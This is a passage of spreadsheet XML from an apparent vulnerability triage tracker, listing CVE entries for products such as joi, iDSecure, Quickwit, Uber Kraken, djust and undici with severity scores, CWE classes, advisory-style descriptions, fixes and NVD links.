          <t>Nodemailer before 9.1.0 contains a quadratic time complexity vulnerability in the addressparser component that allows remote attackers to cause denial of service by supplying a crafted comma-separated address list. Attackers can send a single email with a large number of addresses to block the Node.js event loop for extended periods, consuming 100% CPU and freezing the process.</t>
        </is>
      </c>
      <c r="S676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92596</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92599</t>
        </is>
      </c>
      <c r="D677" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E677" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F677" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G677" s="5" t="inlineStr"/>
      <c r="H677" s="5" t="inlineStr"/>
      <c r="I677" s="5" t="inlineStr"/>
      <c r="J677" s="5" t="inlineStr"/>
      <c r="K677" s="5" t="inlineStr"/>
      <c r="L677" s="5" t="inlineStr"/>
      <c r="M677" s="5" t="inlineStr"/>
      <c r="N677" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O677" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P677" s="5" t="inlineStr"/>
      <c r="Q677" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R677" s="5" t="inlineStr">
        <is>
          <t>joi (npm package `joi`, hapi.js) versions &gt;=17.2.0 &lt;17.13.7 and &gt;=18.0.0 &lt;18.2.6 are vulnerable to regular expression denial of service in the `Joi.string().isoDate()` validation rule. One of the regular expressions the rule applies to the input is unanchored, so a valid ISO date followed by a long run of fractional-second digits causes the regex engine to restart its search from every position in the string, yielding time proportional to the square of the input length (about 1.4 s for 64 KB of digits and about 22 s for 256 KB). A remote attacker who can supply a string to an isoDate validation can stall the application with a single request. Fixed in 17.13.7 and 18.2.6; as a workaround, cap the length of the string before it reaches joi.</t>
        </is>
      </c>
      <c r="S677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92599</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92625</t>
        </is>
      </c>
      <c r="D678" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E678" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F678" s="5" t="inlineStr">
        <is>
          <t>vulnreport@tenable.com</t>
        </is>
      </c>
      <c r="G678" s="5" t="inlineStr"/>
      <c r="H678" s="5" t="inlineStr"/>
      <c r="I678" s="5" t="inlineStr"/>
      <c r="J678" s="5" t="inlineStr"/>
      <c r="K678" s="5" t="inlineStr"/>
      <c r="L678" s="5" t="inlineStr"/>
      <c r="M678" s="5" t="inlineStr"/>
      <c r="N678" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O678" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P678" s="5" t="inlineStr"/>
      <c r="Q678" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R678" s="5" t="inlineStr">
        <is>
          <t>Control iD iDSecure versions prior to 4.8.3.0 are affected by an unauthenticated Denial of Service.
The /api/license/restartService endpoint is reachable without authentication and invokes an internal routine that terminates the iDSecure service process and relaunches it by way of a generated batch script. An unauthenticated remote attacker can call this endpoint repeatedly to hold the service in a continuous restart cycle, rendering it unavailable.</t>
        </is>
      </c>
      <c r="S678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92625</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92626</t>
        </is>
      </c>
      <c r="D679" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E679" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F679" s="5" t="inlineStr">
        <is>
          <t>vulnreport@tenable.com</t>
        </is>
      </c>
      <c r="G679" s="5" t="inlineStr"/>
      <c r="H679" s="5" t="inlineStr"/>
      <c r="I679" s="5" t="inlineStr"/>
      <c r="J679" s="5" t="inlineStr"/>
      <c r="K679" s="5" t="inlineStr"/>
      <c r="L679" s="5" t="inlineStr"/>
      <c r="M679" s="5" t="inlineStr"/>
      <c r="N679" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O679" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P679" s="5" t="inlineStr"/>
      <c r="Q679" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R679" s="5" t="inlineStr">
        <is>
          <t>Control iD iDSecure versions prior to 4.8.3.0 are affected by an unauthenticated Denial of Service.
The /api/dguardintegration/dguardVersion endpoint dereferences DGuard integration login state that may be unset, raising an unhandled null reference exception. The exception is thrown from an asynchronous method that returns void, so it is not observed by a caller and can terminate the iDSecure process.</t>
        </is>
      </c>
      <c r="S679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92626</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92719</t>
        </is>
      </c>
      <c r="D680" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E680" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F680" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G680" s="5" t="inlineStr"/>
      <c r="H680" s="5" t="inlineStr"/>
      <c r="I680" s="5" t="inlineStr"/>
      <c r="J680" s="5" t="inlineStr"/>
      <c r="K680" s="5" t="inlineStr"/>
      <c r="L680" s="5" t="inlineStr"/>
      <c r="M680" s="5" t="inlineStr"/>
      <c r="N680" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O680" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P680" s="5" t="inlineStr"/>
      <c r="Q680" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R680" s="5" t="inlineStr">
        <is>
          <t>Quickwit through 0.9.0 fails to validate the host and scheme of the queue_url parameter in SQS file sources, allowing attackers to make the node issue requests to arbitrary internal addresses. Attackers can supply a malicious queue_url to the create-source API to scan internal networks and fingerprint services based on connection response differences.</t>
        </is>
      </c>
      <c r="S680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92719</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92784</t>
        </is>
      </c>
      <c r="D681" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E681" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F681" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G681" s="5" t="inlineStr"/>
      <c r="H681" s="5" t="inlineStr"/>
      <c r="I681" s="5" t="inlineStr"/>
      <c r="J681" s="5" t="inlineStr"/>
      <c r="K681" s="5" t="inlineStr"/>
      <c r="L681" s="5" t="inlineStr"/>
      <c r="M681" s="5" t="inlineStr"/>
      <c r="N681" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O681" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P681" s="5" t="inlineStr"/>
      <c r="Q681" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R681" s="5" t="inlineStr">
        <is>
          <t>@refinedev/inferencer through 7.0.0 fails to escape API field names when interpolating them into generated JSX source code. Attackers controlling the data provider can inject malicious JavaScript through crafted JSON property names that execute in the developer's browser when the Inferencer page renders.</t>
        </is>
      </c>
      <c r="S681" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92784</t>
        </is>
      </c>
    </row>
    <row r="682">
      <c r="A682" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B682" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C682" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92791</t>
        </is>
      </c>
      <c r="D682" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E682" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F682" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G682" s="5" t="inlineStr"/>
      <c r="H682" s="5" t="inlineStr"/>
      <c r="I682" s="5" t="inlineStr"/>
      <c r="J682" s="5" t="inlineStr"/>
      <c r="K682" s="5" t="inlineStr"/>
      <c r="L682" s="5" t="inlineStr"/>
      <c r="M682" s="5" t="inlineStr"/>
      <c r="N682" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O682" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P682" s="5" t="inlineStr"/>
      <c r="Q682" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R682" s="5" t="inlineStr">
        <is>
          <t>Uber Kraken through 0.1.29 fails to validate the tag parameter in the /tags/{tag} endpoint, allowing unauthenticated attackers to traverse outside the configured storage root. Attackers can use percent-encoded parent-directory segments in the tag parameter to read arbitrary files accessible to the testfs backend process.</t>
        </is>
      </c>
      <c r="S682" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92791</t>
        </is>
      </c>
    </row>
    <row r="683">
      <c r="A683" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B683" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C683" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92792</t>
        </is>
      </c>
      <c r="D683" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E683" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F683" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G683" s="5" t="inlineStr"/>
      <c r="H683" s="5" t="inlineStr"/>
      <c r="I683" s="5" t="inlineStr"/>
      <c r="J683" s="5" t="inlineStr"/>
      <c r="K683" s="5" t="inlineStr"/>
      <c r="L683" s="5" t="inlineStr"/>
      <c r="M683" s="5" t="inlineStr"/>
      <c r="N683" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O683" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P683" s="5" t="inlineStr"/>
      <c r="Q683" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R683" s="5" t="inlineStr">
        <is>
          <t>OpenNHP through 1.0.2 selects its trusted-execution attestation verifier based on attacker-supplied evidence containing a test_purpose key, causing the FallbackVerifier to execute unconditionally. Attackers can bypass attestation verification by including the test_purpose key in evidence and providing enrolled measure and serial number pairs from the allowlist to gain unauthorized access.</t>
        </is>
      </c>
      <c r="S683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92792</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92794</t>
        </is>
      </c>
      <c r="D684" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E684" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F684" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G684" s="5" t="inlineStr"/>
      <c r="H684" s="5" t="inlineStr"/>
      <c r="I684" s="5" t="inlineStr"/>
      <c r="J684" s="5" t="inlineStr"/>
      <c r="K684" s="5" t="inlineStr"/>
      <c r="L684" s="5" t="inlineStr"/>
      <c r="M684" s="5" t="inlineStr"/>
      <c r="N684" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O684" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P684" s="5" t="inlineStr"/>
      <c r="Q684" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R684" s="5" t="inlineStr">
        <is>
          <t>OpenSign through 2.41.3 fails to validate caller identity in the getDocument cloud function when one-time-password verification is disabled. Attackers can supply a document identifier from guest signing links to retrieve complete document details including all signers' information, sender identity, and valid download tokens without authentication.</t>
        </is>
      </c>
      <c r="S684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92794</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92815</t>
        </is>
      </c>
      <c r="D685" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E685" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F685" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G685" s="5" t="inlineStr"/>
      <c r="H685" s="5" t="inlineStr"/>
      <c r="I685" s="5" t="inlineStr"/>
      <c r="J685" s="5" t="inlineStr"/>
      <c r="K685" s="5" t="inlineStr"/>
      <c r="L685" s="5" t="inlineStr"/>
      <c r="M685" s="5" t="inlineStr"/>
      <c r="N685" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O685" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P685" s="5" t="inlineStr"/>
      <c r="Q685" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R685" s="5" t="inlineStr">
        <is>
          <t>changedetection.io through 0.60.6 fails to validate the Goto URL action in browser steps, allowing unauthenticated attackers to access internal addresses. Attackers can supply arbitrary internal URLs in the optional_value parameter to retrieve responses from restricted network locations.</t>
        </is>
      </c>
      <c r="S685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92815</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9336</t>
        </is>
      </c>
      <c r="D686" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E686" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F686" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G686" s="5" t="inlineStr"/>
      <c r="H686" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I686" s="5" t="inlineStr"/>
      <c r="J686" s="5" t="inlineStr">
        <is>
          <t>ibm:websphere</t>
        </is>
      </c>
      <c r="K686" s="5" t="inlineStr">
        <is>
          <t>ibm:websphere_application_server</t>
        </is>
      </c>
      <c r="L686" s="5" t="inlineStr"/>
      <c r="M686" s="5" t="inlineStr"/>
      <c r="N686" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O686" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P686" s="5" t="inlineStr"/>
      <c r="Q686" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R686" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 is vulnerable to a denial of service, caused by sending a specially-crafted HTTP request to an administrative endpoint. A remote attacker could exploit this vulnerability to cause the server to exhaust filesystem space.</t>
        </is>
      </c>
      <c r="S686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9336</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20222</t>
        </is>
      </c>
      <c r="D687" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E687" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F687" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G687" s="5" t="inlineStr"/>
      <c r="H687" s="5" t="inlineStr"/>
      <c r="I687" s="5" t="inlineStr"/>
      <c r="J687" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K687" s="5" t="inlineStr"/>
      <c r="L687" s="5" t="inlineStr"/>
      <c r="M687" s="5" t="inlineStr"/>
      <c r="N687" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O687" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P687" s="5" t="inlineStr"/>
      <c r="Q687" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R687" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the EIGRP implementation in Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, adjacent attacker to cause the device to reload unexpectedly, resulting in a denial of service (DoS) condition.
This vulnerability is due to improper resource management when handling EIGRP update messages. An attacker could exploit this vulnerability by sending crafted EIGRP updates at a high rate to an affected device. A successful exploit could allow the attacker to trigger a memory leak that will eventually cause the affected device to reload unexpectedly.</t>
        </is>
      </c>
      <c r="S687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20222</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42784</t>
        </is>
      </c>
      <c r="D688" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E688" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F688" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G688" s="5" t="inlineStr"/>
      <c r="H688" s="5" t="inlineStr"/>
      <c r="I688" s="5" t="inlineStr"/>
      <c r="J688" s="5" t="inlineStr"/>
      <c r="K688" s="5" t="inlineStr"/>
      <c r="L688" s="5" t="inlineStr"/>
      <c r="M688" s="5" t="inlineStr"/>
      <c r="N688" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O688" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P688" s="5" t="inlineStr"/>
      <c r="Q688" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R688" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in sequoia-openpgp. The library incorrectly infers key flags for older certificates when a key flags subpacket is missing, leading to a discrepancy in how key capabilities are viewed. This key flag confusion allows an attacker to bypass the back-signature check. Consequently, an attacker can illegitimately bind an arbitrary subkey to their own certificate and forge signatures, completely compromising cryptographic integrity.</t>
        </is>
      </c>
      <c r="S688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42784</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61590</t>
        </is>
      </c>
      <c r="D689" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E689" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F689" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G689" s="5" t="inlineStr"/>
      <c r="H689" s="5" t="inlineStr"/>
      <c r="I689" s="5" t="inlineStr"/>
      <c r="J689" s="5" t="inlineStr"/>
      <c r="K689" s="5" t="inlineStr"/>
      <c r="L689" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M689" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N689" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O689" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P689" s="5" t="inlineStr"/>
      <c r="Q689" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-668</t>
        </is>
      </c>
      <c r="R689" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, djust's observability endpoints expose live view/session state and a remote method-invocation surface (`eval_handler`). The localhost restriction was an opt-in middleware that the documented setup omits; the views themselves enforced only `DEBUG`. In the misconfigured-but-documented scenario (DEBUG on, middleware not installed) a non-localhost client could read live application state and invoke handlers remotely. This issue is fixed in djust 1.0.7. The localhost restriction is enforced in-view on every observability endpoint (no longer dependent on a separately-installed middleware), and `eval_handler` is restricted; gated requests receive a non-disclosing response. As a workaround, ensure `DEBUG=False` in production, and do not expose the observability endpoints to untrusted networks.</t>
        </is>
      </c>
      <c r="S689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61590</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61592</t>
        </is>
      </c>
      <c r="D690" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E690" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F690" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G690" s="5" t="inlineStr"/>
      <c r="H690" s="5" t="inlineStr"/>
      <c r="I690" s="5" t="inlineStr"/>
      <c r="J690" s="5" t="inlineStr"/>
      <c r="K690" s="5" t="inlineStr"/>
      <c r="L690" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M690" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N690" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O690" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P690" s="5" t="inlineStr"/>
      <c r="Q690" s="5" t="inlineStr">
        <is>
          <t>CWE-384, CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R690" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, SSE sessions were keyed solely by a client-chosen `session_id` with no binding to the authenticated user — a control the WebSocket transport has but that was dropped on SSE. An attacker who learns (or a victim who leaks) a `session_id` could connect to the message endpoint and dispatch event handlers that execute with the victim's identity and state. This is fixed in djust 1.0.7. Each SSE session is bound to its owning principal at creation and cross-principal access is rejected; SSE session creation is additionally capped per principal. As a workaround, disable the SSE transport.</t>
        </is>
      </c>
      <c r="S690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61592</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84003</t>
        </is>
      </c>
      <c r="D691" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E691" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F691" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G691" s="5" t="inlineStr"/>
      <c r="H691" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I691" s="5" t="inlineStr"/>
      <c r="J691" s="5" t="inlineStr"/>
      <c r="K691" s="5" t="inlineStr">
        <is>
          <t>microsoft:azure\/msal-node</t>
        </is>
      </c>
      <c r="L691" s="5" t="inlineStr"/>
      <c r="M691" s="5" t="inlineStr"/>
      <c r="N691" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O691" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P691" s="5" t="inlineStr"/>
      <c r="Q691" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R691" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by capture-replay in Microsoft Authentication Library (MSAL) for Node.js allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="S691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84003</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85152</t>
        </is>
      </c>
      <c r="D692" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E692" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F692" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G692" s="5" t="inlineStr"/>
      <c r="H692" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I692" s="5" t="inlineStr"/>
      <c r="J692" s="5" t="inlineStr"/>
      <c r="K692" s="5" t="inlineStr">
        <is>
          <t>nodejs:undici</t>
        </is>
      </c>
      <c r="L692" s="5" t="inlineStr"/>
      <c r="M692" s="5" t="inlineStr"/>
      <c r="N692" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O692" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P692" s="5" t="inlineStr"/>
      <c r="Q692" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R692" s="5" t="inlineStr">
        <is>
          <t>undici 8.10.0 omits the destination origin from the cache and request-deduplication keys when the cache or deduplicate interceptor is composed directly onto a Client or Pool. Because the internal cache key falls back to an empty origin string, a cacheable or in-flight response from one upstream origin is returned for a request to a different, trusted origin whenever the method, path, and relevant headers match, which permits cross-origin information disclosure and persistent cache poisoning. The reporter demonstrated a full authentication bypass in which a JWT signed with an attacker-controlled key was accepted as belonging to a trusted issuer, and the trusted origin was never contacted. This is a regression introduced in 8.10.0 and affects undici versions from 8.10.0 up to 8.10.2. Applications using an Agent, which carries the origin in its dispatch options, are not affected. Users should upgrade to undici 8.10.2.</t>
        </is>
      </c>
      <c r="S692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85152</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
